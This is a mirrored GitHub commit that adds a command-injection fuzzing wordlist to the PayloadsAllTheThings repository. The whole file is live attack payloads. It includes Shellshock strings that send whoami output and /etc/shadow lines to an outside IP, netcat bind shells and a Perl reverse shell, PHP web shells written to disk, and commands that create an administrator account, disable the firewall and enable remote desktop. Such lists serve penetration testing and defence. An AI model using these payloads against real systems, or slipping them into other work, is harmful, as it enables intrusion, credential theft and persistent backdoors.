mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2026-01-20 00:20:32 -08:00
Fix name - Part 1
This commit is contained in:
Swissky
448
FIX_Command Injection/Intruder/command_exec.txt
Normal file
448
FIX_Command Injection/Intruder/command_exec.txt
Normal file
@@ -0,0 +1,448 @@
|
||||
`
|
||||
||
|
||||
|
|
||||
;
|
||||
'
|
||||
'"
|
||||
"
|
||||
"'
|
||||
&
|
||||
&&
|
||||
%0a
|
||||
%0a%0d
|
||||
%0Acat%20/etc/passwd
|
||||
%0Aid
|
||||
%0a id %0a
|
||||
%0Aid%0A
|
||||
%0a ping -i 30 127.0.0.1 %0a
|
||||
%0A/usr/bin/id
|
||||
%0A/usr/bin/id%0A
|
||||
%2 -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1
|
||||
%20{${phpinfo()}}
|
||||
%20{${sleep(20)}}
|
||||
%20{${sleep(3)}}
|
||||
a|id|
|
||||
a;id|
|
||||
a;id;
|
||||
a;id\n
|
||||
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=16?user=\`whoami\`"
|
||||
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=18?pwd=\`pwd\`"
|
||||
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=20?shadow=\`grep root /etc/shadow\`"
|
||||
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\`uname -a\`"
|
||||
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=24?shell=\`nc -lvvp 1234 -e /bin/bash\`"
|
||||
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=26?shell=\`nc -lvvp 1236 -e /bin/bash &\`"
|
||||
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=5"
|
||||
() { :;}; /bin/bash -c "sleep 1 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=1&?vuln=6"
|
||||
() { :;}; /bin/bash -c "sleep 1 && echo vulnerable 1"
|
||||
() { :;}; /bin/bash -c "sleep 3 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=3&?vuln=7"
|
||||
() { :;}; /bin/bash -c "sleep 3 && echo vulnerable 3"
|
||||
() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=6&?vuln=8"
|
||||
() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=9&?vuln=9"
|
||||
() { :;}; /bin/bash -c "sleep 6 && echo vulnerable 6"
|
||||
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=17?user=\`whoami\`"
|
||||
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=19?pwd=\`pwd\`"
|
||||
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=21?shadow=\`grep root /etc/shadow\`"
|
||||
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=23?uname=\`uname -a\`"
|
||||
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=25?shell=\`nc -lvvp 1235 -e /bin/bash\`"
|
||||
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=27?shell=\`nc -lvvp 1237 -e /bin/bash &\`"
|
||||
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=4"
|
||||
cat /etc/hosts
|
||||
$(`cat /etc/passwd`)
|
||||
cat /etc/passwd
|
||||
() { :;}; curl http://135.23.158.130/.testing/shellshock.txt?vuln=12
|
||||
| curl http://crowdshield.com/.testing/rce.txt
|
||||
& curl http://crowdshield.com/.testing/rce.txt
|
||||
; curl https://crowdshield.com/.testing/rce_vuln.txt
|
||||
&& curl https://crowdshield.com/.testing/rce_vuln.txt
|
||||
curl https://crowdshield.com/.testing/rce_vuln.txt
|
||||
curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt
|
||||
curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt
|
||||
$(`curl https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)
|
||||
dir
|
||||
| dir
|
||||
; dir
|
||||
$(`dir`)
|
||||
& dir
|
||||
&&dir
|
||||
&& dir
|
||||
| dir C:\
|
||||
; dir C:\
|
||||
& dir C:\
|
||||
&& dir C:\
|
||||
dir C:\
|
||||
| dir C:\Documents and Settings\*
|
||||
; dir C:\Documents and Settings\*
|
||||
& dir C:\Documents and Settings\*
|
||||
&& dir C:\Documents and Settings\*
|
||||
dir C:\Documents and Settings\*
|
||||
| dir C:\Users
|
||||
; dir C:\Users
|
||||
& dir C:\Users
|
||||
&& dir C:\Users
|
||||
dir C:\Users
|
||||
;echo%20'<script>alert(1)</script>'
|
||||
echo '<img src=https://crowdshield.com/.testing/xss.js onload=prompt(2) onerror=alert(3)></img>'// XXXXXXXXXXX
|
||||
| echo "<?php include($_GET['page'])| ?>" > rfi.php
|
||||
; echo "<?php include($_GET['page']); ?>" > rfi.php
|
||||
& echo "<?php include($_GET['page']); ?>" > rfi.php
|
||||
&& echo "<?php include($_GET['page']); ?>" > rfi.php
|
||||
echo "<?php include($_GET['page']); ?>" > rfi.php
|
||||
| echo "<?php system('dir $_GET['dir']')| ?>" > dir.php
|
||||
; echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
|
||||
& echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
|
||||
&& echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
|
||||
echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
|
||||
| echo "<?php system($_GET['cmd'])| ?>" > cmd.php
|
||||
; echo "<?php system($_GET['cmd']); ?>" > cmd.php
|
||||
& echo "<?php system($_GET['cmd']); ?>" > cmd.php
|
||||
&& echo "<?php system($_GET['cmd']); ?>" > cmd.php
|
||||
echo "<?php system($_GET['cmd']); ?>" > cmd.php
|
||||
;echo '<script>alert(1)</script>'
|
||||
echo '<script>alert(1)</script>'// XXXXXXXXXXX
|
||||
echo '<script src=https://crowdshield.com/.testing/xss.js></script>'// XXXXXXXXXXX
|
||||
| echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl
|
||||
; echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl
|
||||
& echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl
|
||||
&& echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl
|
||||
echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl
|
||||
() { :;}; echo vulnerable 10
|
||||
eval('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
|
||||
eval('ls')
|
||||
eval('pwd')
|
||||
eval('pwd');
|
||||
eval('sleep 5')
|
||||
eval('sleep 5');
|
||||
eval('whoami')
|
||||
eval('whoami');
|
||||
exec('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
|
||||
exec('ls')
|
||||
exec('pwd')
|
||||
exec('pwd');
|
||||
exec('sleep 5')
|
||||
exec('sleep 5');
|
||||
exec('whoami')
|
||||
exec('whoami');
|
||||
;{$_GET["cmd"]}
|
||||
`id`
|
||||
|id
|
||||
| id
|
||||
;id
|
||||
;id|
|
||||
;id;
|
||||
& id
|
||||
&&id
|
||||
;id\n
|
||||
ifconfig
|
||||
| ifconfig
|
||||
; ifconfig
|
||||
& ifconfig
|
||||
&& ifconfig
|
||||
/index.html|id|
|
||||
ipconfig
|
||||
| ipconfig /all
|
||||
; ipconfig /all
|
||||
& ipconfig /all
|
||||
&& ipconfig /all
|
||||
ipconfig /all
|
||||
ls
|
||||
$(`ls`)
|
||||
| ls -l /
|
||||
; ls -l /
|
||||
& ls -l /
|
||||
&& ls -l /
|
||||
ls -l /
|
||||
| ls -laR /etc
|
||||
; ls -laR /etc
|
||||
& ls -laR /etc
|
||||
&& ls -laR /etc
|
||||
| ls -laR /var/www
|
||||
; ls -laR /var/www
|
||||
& ls -laR /var/www
|
||||
&& ls -laR /var/www
|
||||
| ls -l /etc/
|
||||
; ls -l /etc/
|
||||
& ls -l /etc/
|
||||
&& ls -l /etc/
|
||||
ls -l /etc/
|
||||
ls -lh /etc/
|
||||
| ls -l /home/*
|
||||
; ls -l /home/*
|
||||
& ls -l /home/*
|
||||
&& ls -l /home/*
|
||||
ls -l /home/*
|
||||
*; ls -lhtR /var/www/
|
||||
| ls -l /tmp
|
||||
; ls -l /tmp
|
||||
& ls -l /tmp
|
||||
&& ls -l /tmp
|
||||
ls -l /tmp
|
||||
| ls -l /var/www/*
|
||||
; ls -l /var/www/*
|
||||
& ls -l /var/www/*
|
||||
&& ls -l /var/www/*
|
||||
ls -l /var/www/*
|
||||
<!--#exec cmd="/bin/cat /etc/passwd"-->
|
||||
<!--#exec cmd="/bin/cat /etc/shadow"-->
|
||||
<!--#exec cmd="/usr/bin/id;-->
|
||||
\n
|
||||
\n\033[2curl http://135.23.158.130/.testing/term_escape.txt?vuln=1?user=\`whoami\`
|
||||
\n\033[2wget http://135.23.158.130/.testing/term_escape.txt?vuln=2?user=\`whoami\`
|
||||
\n/bin/ls -al\n
|
||||
| nc -lvvp 4444 -e /bin/sh|
|
||||
; nc -lvvp 4444 -e /bin/sh;
|
||||
& nc -lvvp 4444 -e /bin/sh&
|
||||
&& nc -lvvp 4444 -e /bin/sh &
|
||||
nc -lvvp 4444 -e /bin/sh
|
||||
nc -lvvp 4445 -e /bin/sh &
|
||||
nc -lvvp 4446 -e /bin/sh|
|
||||
nc -lvvp 4447 -e /bin/sh;
|
||||
nc -lvvp 4448 -e /bin/sh&
|
||||
\necho INJECTX\nexit\n\033[2Acurl https://crowdshield.com/.testing/rce_vuln.txt\n
|
||||
\necho INJECTX\nexit\n\033[2Asleep 5\n
|
||||
\necho INJECTX\nexit\n\033[2Awget https://crowdshield.com/.testing/rce_vuln.txt\n
|
||||
| net localgroup Administrators hacker /ADD
|
||||
; net localgroup Administrators hacker /ADD
|
||||
& net localgroup Administrators hacker /ADD
|
||||
&& net localgroup Administrators hacker /ADD
|
||||
net localgroup Administrators hacker /ADD
|
||||
| netsh firewall set opmode disable
|
||||
; netsh firewall set opmode disable
|
||||
& netsh firewall set opmode disable
|
||||
&& netsh firewall set opmode disable
|
||||
netsh firewall set opmode disable
|
||||
netstat
|
||||
;netstat -a;
|
||||
| netstat -an
|
||||
; netstat -an
|
||||
& netstat -an
|
||||
&& netstat -an
|
||||
netstat -an
|
||||
| net user hacker Password1 /ADD
|
||||
; net user hacker Password1 /ADD
|
||||
& net user hacker Password1 /ADD
|
||||
&& net user hacker Password1 /ADD
|
||||
net user hacker Password1 /ADD
|
||||
| net view
|
||||
; net view
|
||||
& net view
|
||||
&& net view
|
||||
net view
|
||||
\nid|
|
||||
\nid;
|
||||
\nid\n
|
||||
\n/usr/bin/id\n
|
||||
perl -e 'print "X"x1024'
|
||||
|| perl -e 'print "X"x16096'
|
||||
| perl -e 'print "X"x16096'
|
||||
; perl -e 'print "X"x16096'
|
||||
& perl -e 'print "X"x16096'
|
||||
&& perl -e 'print "X"x16096'
|
||||
perl -e 'print "X"x16384'
|
||||
; perl -e 'print "X"x2048'
|
||||
& perl -e 'print "X"x2048'
|
||||
&& perl -e 'print "X"x2048'
|
||||
perl -e 'print "X"x2048'
|
||||
|| perl -e 'print "X"x4096'
|
||||
| perl -e 'print "X"x4096'
|
||||
; perl -e 'print "X"x4096'
|
||||
& perl -e 'print "X"x4096'
|
||||
&& perl -e 'print "X"x4096'
|
||||
perl -e 'print "X"x4096'
|
||||
|| perl -e 'print "X"x8096'
|
||||
| perl -e 'print "X"x8096'
|
||||
; perl -e 'print "X"x8096'
|
||||
&& perl -e 'print "X"x8096'
|
||||
perl -e 'print "X"x8192'
|
||||
perl -e 'print "X"x81920'
|
||||
|| phpinfo()
|
||||
| phpinfo()
|
||||
{${phpinfo()}}
|
||||
;phpinfo()
|
||||
;phpinfo();//
|
||||
';phpinfo();//
|
||||
{${phpinfo()}}
|
||||
& phpinfo()
|
||||
&& phpinfo()
|
||||
phpinfo()
|
||||
phpinfo();
|
||||
<?php system("cat /etc/passwd");?>
|
||||
<?php system("curl https://crowdshield.com/.testing/rce_vuln.txt?method=phpsystem_get");?>
|
||||
<?php system("curl https://crowdshield.com/.testing/rce_vuln.txt?req=df2fkjj");?>
|
||||
<?php system("echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX");?>
|
||||
<?php system("sleep 10");?>
|
||||
<?php system("sleep 5");?>
|
||||
<?php system("wget https://crowdshield.com/.testing/rce_vuln.txt?method=phpsystem_get");?>
|
||||
<?php system("wget https://crowdshield.com/.testing/rce_vuln.txt?req=jdfj2jc");?>
|
||||
:phpversion();
|
||||
`ping 127.0.0.1`
|
||||
& ping -i 30 127.0.0.1 &
|
||||
& ping -n 30 127.0.0.1 &
|
||||
;${@print(md5(RCEVulnerable))};
|
||||
${@print("RCEVulnerable")}
|
||||
${@print(system($_SERVER['HTTP_USER_AGENT']))}
|
||||
pwd
|
||||
| pwd
|
||||
; pwd
|
||||
& pwd
|
||||
&& pwd
|
||||
\r
|
||||
| reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
|
||||
; reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
|
||||
& reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
|
||||
&& reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
|
||||
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
|
||||
\r\n
|
||||
route
|
||||
| sleep 1
|
||||
; sleep 1
|
||||
& sleep 1
|
||||
&& sleep 1
|
||||
sleep 1
|
||||
|| sleep 10
|
||||
| sleep 10
|
||||
; sleep 10
|
||||
{${sleep(10)}}
|
||||
& sleep 10
|
||||
&& sleep 10
|
||||
sleep 10
|
||||
|| sleep 15
|
||||
| sleep 15
|
||||
; sleep 15
|
||||
& sleep 15
|
||||
&& sleep 15
|
||||
{${sleep(20)}}
|
||||
{${sleep(20)}}
|
||||
{${sleep(3)}}
|
||||
{${sleep(3)}}
|
||||
| sleep 5
|
||||
; sleep 5
|
||||
& sleep 5
|
||||
&& sleep 5
|
||||
sleep 5
|
||||
{${sleep(hexdec(dechex(20)))}}
|
||||
{${sleep(hexdec(dechex(20)))}}
|
||||
sysinfo
|
||||
| sysinfo
|
||||
; sysinfo
|
||||
& sysinfo
|
||||
&& sysinfo
|
||||
;system('cat%20/etc/passwd')
|
||||
system('cat C:\boot.ini');
|
||||
system('cat config.php');
|
||||
system('cat /etc/passwd');
|
||||
|| system('curl https://crowdshield.com/.testing/rce_vuln.txt');
|
||||
| system('curl https://crowdshield.com/.testing/rce_vuln.txt');
|
||||
; system('curl https://crowdshield.com/.testing/rce_vuln.txt');
|
||||
& system('curl https://crowdshield.com/.testing/rce_vuln.txt');
|
||||
&& system('curl https://crowdshield.com/.testing/rce_vuln.txt');
|
||||
system('curl https://crowdshield.com/.testing/rce_vuln.txt')
|
||||
system('curl https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2wdf')
|
||||
system('curl https://xerosecurity.com/.testing/rce_vuln.txt');
|
||||
system('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
|
||||
systeminfo
|
||||
| systeminfo
|
||||
; systeminfo
|
||||
& systeminfo
|
||||
&& systeminfo
|
||||
system('ls')
|
||||
system('pwd')
|
||||
system('pwd');
|
||||
|| system('sleep 5');
|
||||
| system('sleep 5');
|
||||
; system('sleep 5');
|
||||
& system('sleep 5');
|
||||
&& system('sleep 5');
|
||||
system('sleep 5')
|
||||
system('sleep 5');
|
||||
system('wget https://crowdshield.com/.testing/rce_vuln.txt?req=22fd2w23')
|
||||
system('wget https://xerosecurity.com/.testing/rce_vuln.txt');
|
||||
system('whoami')
|
||||
system('whoami');
|
||||
test*; ls -lhtR /var/www/
|
||||
test* || perl -e 'print "X"x16096'
|
||||
test* | perl -e 'print "X"x16096'
|
||||
test* & perl -e 'print "X"x16096'
|
||||
test* && perl -e 'print "X"x16096'
|
||||
test*; perl -e 'print "X"x16096'
|
